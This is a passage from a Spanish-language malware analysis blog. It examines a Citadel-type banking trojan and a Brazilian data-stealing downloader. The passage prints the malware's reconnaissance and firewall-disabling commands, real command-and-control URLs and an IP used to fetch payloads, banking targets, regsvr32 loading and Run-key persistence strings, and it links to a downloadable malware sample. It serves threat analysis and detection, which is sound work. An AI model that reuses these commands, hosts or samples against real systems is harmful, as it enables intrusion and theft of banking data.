<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>REG_DWORD DisableNotifications : (S) 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>REG_DWORD DisableUnicastResponsesToMulticastBroadcast : (S) 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Buscando strings en el dump de la memoria de la pc infectada.</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">El troyano realiza un escaneo de la configuración de la pc que es enviado al atacante.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>1180 Console 0 3.876 KB</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>tasklist.exe 1772 Console 0 5.268 KB</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>==========[ C:\Documents and Settings\Administrador ]>ipconfig /all</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Configuraci</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n IP de Windows</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Nombre del host . . . . . . . . . : Equipo01</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Sufijo DNS principal . . . . . . : </b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Tipo de nodo . . . . . . . . . . : desconocido</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Enrutamiento habilitado. . . . . .: No</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Proxy WINS habilitado. . . . . : No</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Adaptador Ethernet Conexi</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n de </b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>rea local :</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Sufijo de conexi</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n espec</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>fica DNS : </b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Descripci</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n. . . . . . . . . . . : Adaptador Ethernet PCI AMD PCNET Family</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Direcci</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n f</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>sica. . . . . . . . . : 08-00-27-80-70-30</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> DHCP habilitado. . . . . . . . . : No</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Autoconfiguraci</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n habilitada. . . : S</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Direcci</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n IP. . . . . . . . . . . : 10.0.2.15</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> M</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>scara de subred . . . . . . . . : 255.255.255.0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Puerta de enlace predeterminada : 10.0.2.2</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Servidor DHCP . . . . . . . . . . : 10.0.2.2</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Servidores DNS . . . . . . . . . .: 10.0.2.3</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Concesi</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n obtenida . . . . . . . : viernes, 22 de agosto de 2014 17:45:52</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Concesi</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>n expira . . . . . . . . .: s</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>bado, 23 de agosto de 2014 17:45:52</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>==========[ C:\Documents and Settings\Administrador ]>netsh firewall set opmode disable</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Aceptar</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>==========[ C:\Documents and Settings\Administrador ]></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>==========[ C:\Documents and Settings\Administrador ]>exit</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>C:\WINDOWS\Explorer.EXE$'</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Microsoft Corporation | Sistema operativo Microsoft</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Windows</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> | 6.00.2900.5512</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Equipo01\Administrador"'</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0pP/</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>;^<*</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Comando y control</span></b><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://nrgg1731.ru/cphouse/file.php|file=soft.exe#N</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://nrgg1731.ru/cphouse/gate.php2N</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://nrgg1731.ru/cphouse/file.php$N</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://poroto6a.ru/cph</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>ouse/file.</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>=con</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>.dll</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>hostname</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>tasklist</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>ipconfig /all</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>netsh firewall set opmode disable</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>#*wellsfargo.com/*</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>@*payment.com/*</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>!http://*.com/*.jpg</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>*facebook.com/*</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>*antivirus*=209.85.22</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://poroto666bbb.ru/cphouse/file.php|file=config.dll</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>http://nrgg1731.ru/cphouse/file.php|file=config.dll</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Peru-Panama</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9BCv9fMZZfgB-w2JlnWyYjzfgFGIK6gE4h0BBbFtxGZ-TrY6pucnuX-R2-8BGeLDkLhtp4bnVIRnsBFoxZSZF1XGJANEWqS59XIQUzlBWGibo7YrtD7VEwMDV-0YBDaQtM4lZ1h28QQk/s1600/cc02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9BCv9fMZZfgB-w2JlnWyYjzfgFGIK6gE4h0BBbFtxGZ-TrY6pucnuX-R2-8BGeLDkLhtp4bnVIRnsBFoxZSZF1XGJANEWqS59XIQUzlBWGibo7YrtD7VEwMDV-0YBDaQtM4lZ1h28QQk/s1600/cc02.png" height="348" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUehydm4TaM9JQQXxAdHoDz-w2LYn7HMQhyWT4GAZLH4KR6BUZZRJX01EUWDn4DjprsyW19URDCqahmAnp4fhL1pVFfTC4TsJGQlHioEgpBoDMFB4oCYuJ9nMH-5yKzNPil7EJBInPq_I/s1600/cc01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUehydm4TaM9JQQXxAdHoDz-w2LYn7HMQhyWT4GAZLH4KR6BUZZRJX01EUWDn4DjprsyW19URDCqahmAnp4fhL1pVFfTC4TsJGQlHioEgpBoDMFB4oCYuJ9nMH-5yKzNPil7EJBInPq_I/s1600/cc01.png" height="534" width="640" /></a></div>
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Muestra:https://dl.dropboxusercontent.com/u/80008916/Citadel-22-08-14.zip</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Es todo por el momento @Dkavalanche 2014</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-69238576624692292782014-08-04T08:27:00.000-07:002014-08-04T08:27:52.138-07:00<b><span style="font-family: Arial, Helvetica, sans-serif;">Troyano Brasileño roba cientos de datos.</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí con UDs. otra muestra de este ya conocido troyano Screen Overlay, esta vez se ha encargado de robar ciento de datos de todo tipo, ya sea bancarios (ITAU, Caixa, Banco do Brasil) como de cuentas de correo de hotmail, gmail, uol, yahoo, pop3, . Estos datos son dejados en un servidor en la nube sin ningun tipo de cifrado de datos por lo que pueden ser leídos por cualquier curioso...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Gracias a <a href="https://twitter.com/rfb_">Raul</a> por el envío de este malware.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtFeHbB17DWAET-ZxhItY_ZfCDnv40md6RmEPdwXA3I6jhC76FOcjb47k3osWT8Z8DymoXS2747M4wNFQhFth4HJYRKWkGvS0pqFr0i5Fa5e77gH_D9cCbyVyy6dB2pKkL8wrANX1mShg/s1600/fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtFeHbB17DWAET-ZxhItY_ZfCDnv40md6RmEPdwXA3I6jhC76FOcjb47k3osWT8Z8DymoXS2747M4wNFQhFth4HJYRKWkGvS0pqFr0i5Fa5e77gH_D9cCbyVyy6dB2pKkL8wrANX1mShg/s1600/fake.jpg" height="488" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Downloader:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en V.T. del archivo adjunto</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu818cgkps09FoLe4LpaWWP3lJUqKlQqGWLykWaIVoaoK6vw1KJOuiavS8UCZsiZabexXxuFKArrwFnD2Skp1eSLctrcbnxY0_UzC8hZ1efLTsq65NzcUBcp2sZ2cUfh_NkgzmsHW_UOc/s1600/vt1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu818cgkps09FoLe4LpaWWP3lJUqKlQqGWLykWaIVoaoK6vw1KJOuiavS8UCZsiZabexXxuFKArrwFnD2Skp1eSLctrcbnxY0_UzC8hZ1efLTsq65NzcUBcp2sZ2cUfh_NkgzmsHW_UOc/s1600/vt1.jpg" height="182" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Se trata de un .CPL compilado en Delphi7.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Algunos Strings interesantes:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004917AC <ansistring> 'Brasil'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004917BC <ansistring> 'E473BA5D9C48FB27D679AD3790C3DA67995994B66D934F'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004917F4 <ansistring> '\\Desk'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491804 <ansistring> 'Settings\\'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491818 <ansistring> '\\D'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491824 <ansistring> '\\'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491830 <ansistring> 'D'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0049183C <ansistring> 'a'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491848 <ansistring> 'd'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491854 <ansistring> 'o'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491860 <ansistring> 's'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0049186C <ansistring> ' '</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491878 <ansistring> 'e'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491884 <ansistring> 'aplicativos\\'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0049189C <ansistring> 'Users\\'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004918AC <ansistring> '\\AppData\\Roaming\\'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004918C8 <ansistring> ':\\'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004918D4 <ansistring> '79BB689F5EDA5CC6BAC0CCC2C1C3C8B3BDBAB1A89185FC7EE0246CA3'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491918 <ansistring> '88E2403B'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0049192C <ansistring> '78BB78E517D210'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491944 <ansistring> '222F262FCD67FE1C2CBB3DBE37BE37C346DB698EADB148DD628CE87DF977FE61E9738BA7A6B03DB632B6274CE469'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004919AC <ansistring> 'F079'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004919BC <ansistring> ':\\Windows\\System32\\REGSVR32.EXE \"'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004919E0 <pansichar> '2.jpg\"'</pansichar></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004919F0 <ansistring> '57D7'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 004919F8 <pansichar> '6.jpg\"'</pansichar></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491A08 <ansistring> 'C5A0'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491A10 <pansichar> '5.jpg\"'</pansichar></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491A20 <ansistring> '5.jpg'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491A30 <ansistring> '5.txt'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491A40 <ansistring> ':\\Windows\\System32\\cmd.exe /k regsvr32.exe \"'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491A78 <ansistring> '\"'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491A84 <ansistring> '2.jpg'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491A94 <ansistring> '2.txt'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491AA4 <ansistring> '6.jpg'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00491AB4 <ansistring> '6.txt'</ansistring></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Cadenas codificadas:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E473BA5D9C48FB27D679AD3790C3DA67995994B66D934F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">79BB689F5EDA5CC6BAC0CCC2C1C3C8B3BDBAB1A89185FC7EE0246CA3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">88E2403B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">78BB78E517D210</span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">222F262FCD67FE1C2CBB3DBE37BE37C346DB698EADB148DD628CE87DF977FE61E9738BA7A6B03DB632B6274CE469</span></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Decodifican como:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
Documents and Settings</div>
<div class="separator" style="clear: both;">
http://198.23.250.211/2107/</div>
<div class="separator" style="clear: both;">
058</div>
<div class="separator" style="clear: both;">
id.sys</div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Este downloader descarga tres amenazas mas desde http://198.23.250.211/2107/</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTKaZO0np2pkujLZB4ZUWHbSkkcVF-jY6n6TyklLXeRYtaHAaU190PbAZTrsi1TgNyJvN0Cs_phm_CM2TJKAS2kSd-wEadNb8GtLxWJeviJ9bHxZi3Dc65OjTti0enXzeyIHbkq2ik4k0/s1600/payloads.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTKaZO0np2pkujLZB4ZUWHbSkkcVF-jY6n6TyklLXeRYtaHAaU190PbAZTrsi1TgNyJvN0Cs_phm_CM2TJKAS2kSd-wEadNb8GtLxWJeviJ9bHxZi3Dc65OjTti0enXzeyIHbkq2ik4k0/s1600/payloads.jpg" height="400" width="640" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>2.txt</b> (es un cpl que es cargado en memoria por el downloader)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en V.T. </span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpZW0TSAc8Rw3atw5vAPMZRZ-P4BvRn4ji7lLRYU8ZXfHGQ0u-l1KFpLqIEjgW7xl4T4IA5tCxRHJwefcxSmvF-BnOeqnNjn7XC3OtlTUkI-OV2_BPuXsjLbnJ-ibcBcEvLfTdTAtUeNk/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpZW0TSAc8Rw3atw5vAPMZRZ-P4BvRn4ji7lLRYU8ZXfHGQ0u-l1KFpLqIEjgW7xl4T4IA5tCxRHJwefcxSmvF-BnOeqnNjn7XC3OtlTUkI-OV2_BPuXsjLbnJ-ibcBcEvLfTdTAtUeNk/s1600/vt2.jpg" height="172" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Cadenas codificadas:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">62F138EF1BCF6880B9EA0444831DA73AC47EE1721CE0634C874</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">36CB769B87A84EF668F9588D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0830C97B9042F228C40B4094F76CE2191223CC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">223FF821D77BCD5E8CC803CF084690B88D84B05E8BBA5491</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BA7EB46A81B176964369BC80F4F8FC4659DA94A89A2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7EEB4427C173B335886</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">48C1739546E918C3CA1C6024E9A30</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">59EE09281839FE210257F3D63</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">20D86293B86A9A40EC5388CCCF044AFE788D59</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D442FB26D070C641E96AECD972EC6983F66A96B15F96BF7D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">54E70EC169995E8E4E83D0074787C3C7DB540F022CB7EA571953794CD0D4EF76D9C47F3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">14072DE2063AFE29D0C332AB2FAD2ED568DF543FC473A55E85C4110976E76DE2063EFA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">25026AC97CA94AE61704051D5FF94DFF39F20D66E40933C97FDB63</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB4DF719092ECB74EF61E77D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">3FFB0530DD0F27D47BDD73E723B118CCAF45EE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1C053EE41336000826A6212EAE2FAB443120DC0A27DE0825</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">39F83FF018C8618B4D9CC9005EF06684B3243F525CE71A849FF5989D4044E8AC762</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C3579D51F829C16A9380F660FB5080A75A2D0368E71037CF73ED39449530A826C4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">83EC4526C072B25981</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">53DE57CCB4A788F569ADD373E5AA6E4</span></div>
<div class="separator" style="clear: both;">
